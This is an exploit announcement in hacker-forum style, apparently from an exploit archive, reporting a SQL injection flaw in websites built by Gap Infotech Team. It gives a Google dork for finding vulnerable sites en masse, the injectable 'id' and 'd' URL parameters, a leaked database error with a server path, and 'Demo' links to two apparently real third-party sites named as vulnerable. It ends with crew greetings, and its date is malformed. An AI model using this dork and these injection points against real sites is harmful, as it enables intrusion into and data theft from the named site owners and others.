Gap Infotech Team suffers from a remote SQL injection vulnerability.
0c533653c8f4f325211b46563d50b92350ac07b7c88efca7e10fddc4159ddb74
_________________________________________________________
#
# Exploit Title: Gap Infotech Team SQL Injection Vulnerability
# -[Google Dork]-: "Powered by: Gap Infotech Team"
# Date: 2011-18-09
# Author: nGa Sa Lu [ GaNgst3r ]
# Service Link: http://www.gapinfotech.com
# Tested on: Vista
# Platform : php
# ________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>> Google Dork : "Powered by: Gap Infotech Team" >>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
------------------------------------------------------------------------------------------------
http://localhost.com/detail.php?id=[SQL]
http://localhost.com/news/pdetail.php?d=[SQL]
------------------------------------------------------------------------------------------------
# SQL Error Statement
------------------------
Warning: Wrong parameter count for mysql_query() in /home/content/15/6527915/html/newresidentialprojectsingurgaon/detail.php on line 114
# Demo
---------
http://newresidentialprojectsingurgaon.in/detail.php?id=54
http://anjum.co.in/news/pdetail.php?d=63
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>> Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros >>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>> [ dongoth ] >> [ GaNgst3r ] >> [ nGa Sa Lu ] >> m3 :>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>